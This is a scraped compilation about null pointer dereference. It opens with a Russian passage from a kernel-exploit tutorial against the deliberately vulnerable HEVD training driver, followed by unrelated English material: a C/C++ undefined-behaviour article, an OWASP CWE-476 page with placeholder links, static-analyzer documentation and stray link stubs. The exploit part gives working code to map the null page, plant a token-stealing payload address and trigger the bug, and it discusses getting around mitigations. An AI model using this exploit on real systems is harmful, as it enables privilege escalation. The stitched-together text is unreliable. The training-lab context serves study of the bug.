NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
ULONG UserValue = 0;
ULONG MagicValue = 0xBAD0B0B0;
NTSTATUS Status = STATUS_SUCCESS;
PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

PAGED_CODE();

__try {
// Verify if the buffer resides in user mode
ProbeForRead(UserBuffer,
sizeof(NULL_POINTER_DEREFERENCE),
(ULONG)__alignof(NULL_POINTER_DEREFERENCE));

// Allocate Pool chunk
NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
ExAllocatePoolWithTag(NonPagedPool,
sizeof(NULL_POINTER_DEREFERENCE),
(ULONG)POOL_TAG);

if (!NullPointerDereference) {
// Unable to allocate Pool chunk
DbgPrint(«[-] Unable to allocate Pool chunkn»);

Status = STATUS_NO_MEMORY;
return Status;
}
else {
DbgPrint(«[+] Pool Tag: %sn», STRINGIFY(POOL_TAG));
DbgPrint(«[+] Pool Type: %sn», STRINGIFY(NonPagedPool));
DbgPrint(«[+] Pool Size: 0x%Xn», sizeof(NULL_POINTER_DEREFERENCE));
DbgPrint(«[+] Pool Chunk: 0x%pn», NullPointerDereference);
}

// Get the value from user mode
UserValue = *(PULONG)UserBuffer;

DbgPrint(«[+] UserValue: 0x%pn», UserValue);
DbgPrint(«[+] NullPointerDereference: 0x%pn», NullPointerDereference);

// Validate the magic value
if (UserValue == MagicValue) {
NullPointerDereference->Value = UserValue;
NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

DbgPrint(«[+] NullPointerDereference->Value: 0x%pn», NullPointerDereference->Value);
DbgPrint(«[+] NullPointerDereference->Callback: 0x%pn», NullPointerDereference->Callback);
}
else {
DbgPrint(«[+] Freeing NullPointerDereference Objectn»);
DbgPrint(«[+] Pool Tag: %sn», STRINGIFY(POOL_TAG));
DbgPrint(«[+] Pool Chunk: 0x%pn», NullPointerDereference);

// Free the allocated Pool chunk
ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

// Set to NULL to avoid dangling pointer
NullPointerDereference = NULL;
}

#ifdef SECURE
// Secure Note: This is secure because the developer is checking if
// ‘NullPointerDereference’ is not NULL before calling the callback function
if (NullPointerDereference) {
NullPointerDereference->Callback();
}
#else
DbgPrint(«[+] Triggering Null Pointer Dereferencen»);

// Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
// because the developer is not validating if ‘NullPointerDereference’ is NULL
// before calling the callback function
NullPointerDereference->Callback();
#endif
}
__except (EXCEPTION_EXECUTE_HANDLER) {
Status = GetExceptionCode();
DbgPrint(«[-] Exception Code: 0x%Xn», Status);
}

return Status;
}

Невытесняемая память пула выделяется равной размеру структуры NULL_POINTER_DEREFERENCE вместе с 4-байтовым тегом kcaH. Структура содержит два поля:

typedef struct _NULL_POINTER_DEREFERENCE {
ULONG Value;
FunctionPointer Callback;
} NULL_POINTER_DEREFERENCE, *PNULL_POINTER_DEREFERENCE;

В системах x86 структура занимает 8 байт и содержит указатель функции. Если пользовательский буфер содержит MagicValue, указатель функции NullPointerDereference->Callback будет указывать на функцию NullPointerDereferenceObjectCallback. Но что произойдет, если мы не будет передавать это значение?

В этом случае память пула освобождается и структуре NullPointerDereference присваивается значение NULL, чтобы избежать повисшего указателя. Однако этот трюк допустим только, если присутствует проверка, которую нужно делать каждый раз, когда вы используете данный указатель. Если просто установить значение NULL и не выполнять никаких проверок, то, как будет показано дальше, последствия могут быть печальны. В нашем случае функция Callback вызывается без проверки на предмет нахождения внутри корректной структуры. В итоге все заканчивается чтением с пустой страницы (первых 64 Кбайт), которая находится в пространстве пользователя.

То есть NullPointerDereference представляет собой структуру по адресу 0x00000000, и NullPointerDereference->Callback() вызывает то, что находится по адресу 0x00000004.

Схема эксплуатации данной фитчи выглядит следующим образом:

  • Выделяем пустую страницу.
  • Размещаем адрес полезной нагрузки по адресу 0x4.
  • Инициируем разыменование пустой страницы через IOCTL драйвера.

Краткая история защит от уязвимостей, связанных с разыменованием пустой страницы

Прежде чем продолжить, рассмотрим, что уже предпринималось разработчиками Windows для предотвращения атак с использованием уязвимостей, связанных с разыменованием пустого указателя.

  • EMET (Enhanced Mitigation Experience Toolkit) – средство защиты в том числе от атак на базе разыменования пустой страницы. После выделения на пустую страницу ставится пометка «NOACCESS». На данный момент EMET не используется, а некоторые функции этой утилиты встроены в Windows 10 и являются частью системы защиты от эксплоитов.
  • Начиная с Windows 8, выделение первых 64 Кбайт запрещено. Единственное исключение – если разрешен компонент NTVDM, который по умолчанию отключен.

То есть в Windows 10 эту уязвимость эксплуатировать не получится. Если хотите попробовать, нужно включить NTVDM, после чего потребуется обход SMEP (см. четвертую часть).

Статьи, рекомендованные для изучения:

  • Exploit Mitigation Improvements in Windows 8
  • Windows 10 Mitigation Improvements

Выделение пустой страницы

Перед началом взаимодействия с драйвером нам нужно выделить пустую страницу и разместить адрес полезной нагрузки по адресу 0x4. Выделить пустую страницу через VirtualAllocEx не получится. Альтернативный вариант: нахождение адреса функции NtAllocateVirtualMemory в ntdll.dll и передача небольшого ненулевого базового адреса, который будет округлен до значения NULL.

Чтобы найти адрес вышеуказанной функции, вначале мы будем использовать GetModuleHandle для получения адреса ntdll.dll, а затем GetProcAddress для получения адреса процесса.

typedef NTSTATUS(WINAPI *ptrNtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);

ptrNtAllocateVirtualMemory NtAllocateVirtualMemory = (ptrNtAllocateVirtualMemory)GetProcAddress(GetModuleHandle(«ntdll.dll»), «NtAllocateVirtualMemory»);
if (NtAllocateVirtualMemory == NULL)
{
printf(«[-] Failed to export NtAllocateVirtualMemory.»);
exit(-1);
}

Затем нужно выделить пустую страницу:

// Copied and modified from http://www.rohitab.com/discuss/topic/34884-c-small-hax-to-avoid-crashing-ur-prog/
LPVOID baseAddress = (LPVOID)0x1;
ULONG allocSize = 0x1000;
char* uBuffer = (char*)NtAllocateVirtualMemory(
GetCurrentProcess(),
&baseAddress, // Putting a small non-zero value gets rounded down to page granularity, pointing to the NULL page
0,
&allocSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);

Чтобы проверить работоспособность метода, размещаем функцию DebugBreak и проверяем содержимое памяти после записи какого-либо значения.
DebugBreak();
*(INT_PTR*)uBuffer = 0xaabbccdd;
kd> t
KERNELBASE!DebugBreak+0x3:
001b:7531492f ret

kd> ? @esi
Evaluate expression: 0 = 00000000

kd> t
HEVD!main+0x1a4:
001b:002e11e4 mov dword ptr [esi],0AABBCCDDh

kd> t
HEVD!main+0x1aa:
001b:002e11ea movsx ecx,byte ptr [esi]

kd> dd 0
00000000 aabbccdd 00000000 00000000 00000000
00000010 00000000 00000000 00000000 00000000
00000020 00000000 00000000 00000000 00000000
00000030 00000000 00000000 00000000 00000000
00000040 00000000 00000000 00000000 00000000
00000050 00000000 00000000 00000000 00000000
00000060 00000000 00000000 00000000 00000000
00000070 00000000 00000000 00000000 00000000

Прекрасный способ проверить, выделена ли пустая страница – вызывать VirtualProtect, которая запрашивает/устанавливает защитные флаги на страницы памяти. Если функция VirtualProtect возвращает false, значит, пустая страница не выделена.

Контроль потока выполнения

Теперь нам нужно разместить адрес полезной нагрузки по адресу 0x00000004:

*(INT_PTR*)(uBuffer + 4) = (INT_PTR)&StealToken;

Создаем буфер для отсылки драйверу и устанавливаем точку останова по адресу HEVD!TriggerNullPointerDereference + 0x114.
kd> dd 0
00000000 00000000 0107129c 00000000 00000000
00000010 00000000 00000000 00000000 00000000
00000020 00000000 00000000 00000000 00000000
00000030 00000000 00000000 00000000 00000000
00000040 00000000 00000000 00000000 00000000
00000050 00000000 00000000 00000000 00000000
00000060 00000000 00000000 00000000 00000000
00000070 00000000 00000000 00000000 00000000

После запуска полезной нагрузки и кражи токена инструкция ret выполняется, и корректировка стека не требуется.


Рисунок 1: Демонстрация работы эксплоита

Портирование эксплоита для Windows 7 x64

Чтобы эксплоит заработал в системе Windows 7 x64 нужно поменять смещение, по которому будет записываться адрес полезной нагрузки, поскольку размер структуры становится 16 байт. Кроме того, не забудьте выгрузить полезную нагрузку.

*(INT_PTR*)(uBuffer + 8) = (INT_PTR)&StealToken;

I have unintentionally raised a large debate recently concerning the question if it is legal in C/C++ to use the &P->m_foo expression with P being a null pointer. The programmers’ community divided into two camps. The first claimed with confidence that it wasn’t legal while the others were as sure saying that it was. Both parties gave various arguments and links, and it occurred to me at some point that I had to make things clear. For that purpose, I contacted Microsoft MVP experts and Visual C++ Microsoft development team communicating through a closed mailing list. They helped me to prepare this article and now everyone interested is welcome to read it. For those who can’t wait to learn the answer: That code is NOT correct.

Debate history

It all started with an article about a Linux kernel’s check by the PVS-Studio analyzer. But the issue doesn’t have to do anything with the check itself. The point is that in that article I cited the following fragment from Linux’ code:

1
2
3
4
5
6
7
8
9
10
static int podhd_try_init(struct usb_interface *interface,
        struct usb_line6_podhd *podhd)
{
  int err;
  struct usb_line6 *line6 = &podhd->line6;

  if ((interface == NULL) || (podhd == NULL))
    return -ENODEV;
  ....
}

I called this code dangerous because I thought it to cause undefined behavior.

After that, I got a pile of emails and comments, readers objecting to that idea of mine, and even was almost about to give in to their convincing arguments. For instance, as proof of that code being correct they pointed out the implementation of the offsetof macro, typically looking like this:

#define offsetof(st, m) ((size_t)(&((st *)0)->m))

We deal with null pointer dereferencing here, but the code still works well. There were also some other emails reasoning that since there had been no access by null pointer, there was no problem.

Although I tend to be gullible, I still try to double-check any information I may doubt. I started investigating the subject and eventually wrote a small article: «Reflections on the Null Pointer Dereferencing Issue».

Everything suggested that I had been right: One cannot write code like that. But I didn’t manage to provide convincing proof for my conclusions and cite the relevant excerpts from the standard.

After publishing that article, I again was bombarded by protesting emails, so I thought I should figure it all out once and for all. I addressed language experts with a question to find out their opinions. This article is a summary of their answers.

About C

The ‘&podhd->line6’ expression is undefined behavior in the C language when ‘podhd’ is a null pointer.

The C99 standard says the following about the ‘&’ address-of operator (6.5.3.2 «Address and indirection operators»):

The operand of the unary & operator shall be either a function designator, the result of a [] or unary * operator, or an lvalue that designates an object that is not a bit-field and is not declared with the register storage-class specifier.

The expression ‘podhd->line6’ is clearly not a function designator, the result of a [] or * operator. It is an lvalue expression. However, when the ‘podhd’ pointer is NULL, the expression does not designate an object since 6.3.2.3 «Pointers» says:

If a null pointer constant is converted to a pointer type, the resulting pointer, called a null pointer, is guaranteed to compare unequal to a pointer to any object or function.

When «an lvalue does not designate an object when it is evaluated, the behavior is undefined» (C99 6.3.2.1 «Lvalues, arrays, and function designators»):

An lvalue is an expression with an object type or an incomplete type other than void; if an lvalue does not designate an object when it is evaluated, the behavior is undefined.

So, the same idea in brief:

When -> was executed on the pointer, it evaluated to an lvalue where no object exists, and as a result the behavior is undefined.

About C++

In the C++ language, things are absolutely the same. The ‘&podhd->line6’ expression is undefined behavior here when ‘podhd’ is a null pointer.

The discussion at WG21 (232. Is indirection through a null pointer undefined behavior?), to which I referred to in the previous article, brings in some confusion. The programmers participating in it insist that this expression is not undefined behavior. However, no one has found any clause in the C++ standard permitting the use of «poldh->line6» with «polhd» being a null pointer.

The «polhd» pointer fails the basic constraint (5.2.5/4, second bullet) that it must designate an object. No C++ object has nullptr as address.

Summing it all up

struct usb_line6 *line6 = &podhd->line6;

This code is incorrect in both C and C++ when the podhd pointer equals 0. If the pointer equals 0, undefined behavior occurs.

The program running well is pure luck. Undefined behavior may take different forms, including program execution in just the way the programmer expected. It’s just one of the special cases of undefined behavior, and that’s all.

You cannot write code like that. The pointer must be checked before being dereferenced.

Additional ideas and links

  • When considering the idiomatic implementation of the ‘offsetof()’ operator, one must take into account that a compiler implementation is permitted to use what would be non-portable techniques to implement its functionality. The fact that a compiler’s library implementation uses the null pointer constant in its implementation of ‘offsetof()’ doesn’t make it OK for user code to use ‘&podhd->line6’ when ‘podhd’ is a null pointer.
  • GCC can / does optimize assuming no undefined behavior ever occurs, and would remove the null checks here — the Kernel compiles with a bunch of switches to tell the compiler not to do this. As an example, the experts refer to the article «What Every C Programmer Should Know About Undefined Behavior #2/3».
  • You may also find it interesting that a similar use of a null pointer was involved in a kernel exploit with the TUN/TAP driver. See «Fun with NULL pointers». The major difference that might cause some people to think the similarity doesn’t apply is that in the TUN/TAP driver bug the structure field that the null pointer accessed was explicitly taken as a value to initialize a variable instead of simply having the address of the field taken. However, as far as standard C goes, taking the address of the field through a null pointer is still undefined behavior.
  • Is there any case when writing &P->m_foo where P == nullptr is OK? Yes, for example when it is an argument of the sizeof operator: sizeof(&P->m_foo).

Acknowledgements

This article has become possible thanks to the experts whose competence I can see no reason to doubt. I want to thank the following people for helping me in writing it:

  • Michael Burr is a C/C++ enthusiast who specializes in systems level and embedded software including Windows services, networking, and device drivers. He can often be found on the StackOverflow community answering questions about C and C++ (and occasionally fielding the easier C# questions). He has 6 Microsoft MVP awards for Visual C++.
  • Billy O’Neal is a (mostly) C++ developer and contributor to StackOverflow. He is a Microsoft Software Development Engineer on the Trustworthy Computing Team. He has worked at several security related places previously, including Malware Bytes and PreEmptive Solutions.
  • Giovanni Dicanio is a computer programmer, specialized in Windows operating system development. Giovanni wrote computer programming articles on C++, OpenGL and other programming subjects on Italian computer magazines. He contributed code to some open-source projects as well. Giovanni likes helping people solving C and C++ programming problems on Microsoft MSDN forums and recently on StackOverflow. He has 8 Microsoft MVP awards for Visual C++.
  • Gabriel Dos Reis is a Principal Software Development Engineer at Microsoft. He is also a researcher and a longtime member of the C++ community. His research interests include programming tools for dependable software. Prior to joining Microsoft, he was Assistant Professor at Texas A&M University. Dr. Dos Reis was a recipient of the 2012 National Science Foundation CAREER award for his research in compilers for dependable computational mathematics and educational activities. He is a member of the C++ standardization committee.

References

  1. Wikipedia. Undefined Behavior.
  2. A Guide to Undefined Behavior in C and C++. Part 1, 2, 3.
  3. Wikipedia. offsetof.
  4. LLVM Blog. What Every C Programmer Should Know About Undefined Behavior #2/3.
  5. LWN. Fun with NULL pointers. Part 1, 2.

CWE-476 Null Pointer Dereference is a programming error that can occur when a program attempts to deference a null pointer. This can happen when the programmer mistakenly assumes that a pointer pointing to NULL is actually pointing to a valid object. If the program dereferences the null pointer, it can cause a segmentation fault or other undefined behavior, which can lead to a crash.

Null pointer dereferences are particularly common in C and C++ programs, since these languages do not automatically check for NULL pointers. As a result, it is important for programmers to be careful when handling pointers in these languages.

There are a few ways to avoid null pointer dereferences. One is to use a language that does not allow them, such as Java. Another is to always check pointers for NULL before dereferencing them. Finally, some languages (such as C++) provide special operators that can be used to automatically check for NULL pointers before dereferencing them. These operators can help reduce the risk of null pointer dereferences, but they are not foolproof.

Null pointer dereferences can be difficult to debug, since they can occur in code that appears to be correct. As a result, it is important to test programs thoroughly before releasing them. Additionally, tools such as valgrind can be used to detect null pointer dereferences at runtime.

Development Speed or Code Security. Why Not Both?

Mayhem is an award-winning AI that autonomously finds new exploitable bugs and improves your test suites.

Get Mayhem Free Request A Demo

Stay Connected


Subscribe to Updates

By submitting this form, you agree to our
Terms of Use
and acknowledge our
Privacy Statement.

Thank you for visiting OWASP.org. We recently migrated our community to a new web platform and regretably the content for this page needed to be programmatically ported from its previous wiki page. There’s still some work to be done.

NVD Categorization

CWE-476: NULL Pointer Dereference: A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.

Description

The program can potentially dereference a null pointer, thereby raising
a NullPointerException. Null pointer errors are usually the result of
one or more programmer assumptions being violated. Most null pointer
issues result in general software reliability problems, but if an
attacker can intentionally trigger a null pointer dereference, the
attacker might be able to use the resulting exception to bypass security
logic or to cause the application to reveal debugging information that
will be valuable in planning subsequent attacks.

A null-pointer dereference takes place when a pointer with a value of
NULL is used as though it pointed to a valid memory area.

Null-pointer dereferences, while common, can generally be found and
corrected in a simple way. They will always result in the crash of the
process, unless exception handling (on some platforms) is invoked, and
even then, little can be done to salvage the process.

Consequences

  • Availability: Null-pointer dereferences invariably result in the
    failure of the process.

Exposure period

  • Requirements specification: The choice could be made to use a
    language that is not susceptible to these issues.
  • Implementation: Proper sanity checks at implementation time can
    serve to prevent null-pointer dereferences

Platform

  • Languages: C, C++, Java, Assembly
  • Platforms: All

Examples

Example 1

In the following code, the programmer assumes that the system always has
a property named “cmd” defined. If an attacker can control the program’s
environment so that “cmd” is not defined, the program throws a null
pointer exception when it attempts to call the trim() method.

   String cmd = System.getProperty("cmd");
   cmd = cmd.trim();

Example 2

Null-pointer dereference issues can occur through a number of flaws,
including race conditions and simple programming omissions. While there
are no complete fixes aside from contentious programming, the following
steps will go a long way to ensure that null-pointer dereferences do not
occur.

Before using a pointer, ensure that it is not equal to NULL:

if (pointer1 != NULL) {
  /* make use of pointer1 */
  /* ... */
}

When freeing pointers, ensure they are not set to NULL, and be sure to
set them to NULL once they are freed:

if (pointer1 != NULL) {
  free(pointer1);
  pointer1 = NULL;
}

If you are working with a multi-threaded or otherwise asynchronous
environment, ensure that proper locking APIs are used to lock before the
if statement; and unlock when it has finished.

  • Miscalculated null
    termination
  • State synchronization
    error
  • Requirements specification: The choice could be made to use a
    language that is not susceptible to these issues.
  • Implementation: If all pointers that could have been modified are
    sanity-checked previous to use, nearly all null-pointer dereferences
    can be prevented.

References

  • CWE 79.
  • http://www.link1.com
  • Title for the link2

Category:Code Quality
Vulnerability
Category:Java
Category:Vulnerability

  • malloc, realloc
  • Additional Settings

The analyzer detected a fragment of code that might cause using a null pointer.

Let’s study several examples the analyzer generates the V522 diagnostic message for:

if (pointer != 0 || pointer->m_a) { ... }
if (pointer == 0 && pointer->x()) { ... }
if (array == 0 && array[3]) { ... }
if (!pointer && pointer->x()) { ... }

In all the conditions, there is a logical error that leads to dereferencing of the null pointer. The error may be introduced into the code during code refactoring or through a misprint.

Correct versions:

if (pointer == 0 || pointer->m_a) { ... }
if (pointer != 0 && pointer->x()) { ... }
if (array != 0 && array[3]) { ... }
if (pointer && pointer->x()) { ... }

These are simple cases, of course. In practice, operations of pointer check and pointer use may be located in different places. If the analyzer generates the V522 warning, study the code above and try to understand why the pointer might be a null pointer.

Here is a code sample where pointer check and pointer use are in different strings

if (ptag == NULL) {
  SysPrintf("SPR1 Tag BUSERRn");
  psHu32(DMAC_STAT)|= 1<<15;
  spr1->chcr = ( spr1->chcr & 0xFFFF ) |
               ( (*ptag) & 0xFFFF0000 );   
  return;
}

The analyzer will warn you about the danger in the «( (*ptag) & 0xFFFF0000 )» string. It’s either an incorrectly written condition here or there should be a different variable instead of ‘ptag’.

Sometimes programmers deliberately use null pointer dereferencing for the testing purpose. For example, analyzer will produce the warning for those places that contain this macro:

/// This generate a coredump when we need a
/// method to be compiled but not usabled.
#define elxFIXME { char * p=0; *p=0; }

Extraneous warnings can be turned off by using the «//-V522» comment in those strings that contain the ‘elxFIXME’ macro. Or, as an alternative, you can write a comment of a special kind beside the macro:

//-V:elxFIXME:522

The comment can be written both before and after the macro — it doesn’t matter. To learn more about methods of suppressing false positives, follow here.

malloc, realloc

Programmers often don’t preliminarily check the pointer returned by the ‘malloc’ or similar functions. This omission often results in a warning. Some programmers believe that it is not necessary to check the pointer. If a programmer gets a memory allocation error, the program is no longer functional anyway. So it is an acceptable scenario when a program crashes due to the null pointer.

However, everything is much more complicated and dangerous than it may seem at first glance. We suggest reading the article: «Why it is important to check what the malloc function returned».

If you still do not plan to check such pointers, keep reading to find out about the specialized analyzer configuration.

Additional Settings

This diagnostic relies on information about whether a particular pointer could be null. In some cases, this information is retrieved from the table of annotated functions, which is stored inside the analyzer itself.

‘malloc’ is one of such functions. Since it can return ‘NULL’, using the pointer returned by it without a prior check may result in null pointer dereferencing.

Sometimes our users wish to change the analyzer’s behavior and make it think that ‘malloc’ cannot return ‘NULL’. For example, to do that, they use the system libraries, where ‘out of memory’ errors are handled in a specific way.

They may also want to tell the analyzer that a certain function can return a null pointer.

In that case, you can use the additional settings, described in the section «How to tell the analyzer that a function can or cannot return nullptr».

This diagnostic is classified as:

  • CWE-476
  • CWE-690
  • CERT-EXP34-C
  • CERT-MEM52-CPP

  • Ошибка null pointer conversion
  • Ошибка null object reference
  • Ошибка null call of duty black ops 3 zombies
  • Ошибка ntvdm windows 7
  • Ошибка ntoskrnl exe windows 10 как исправить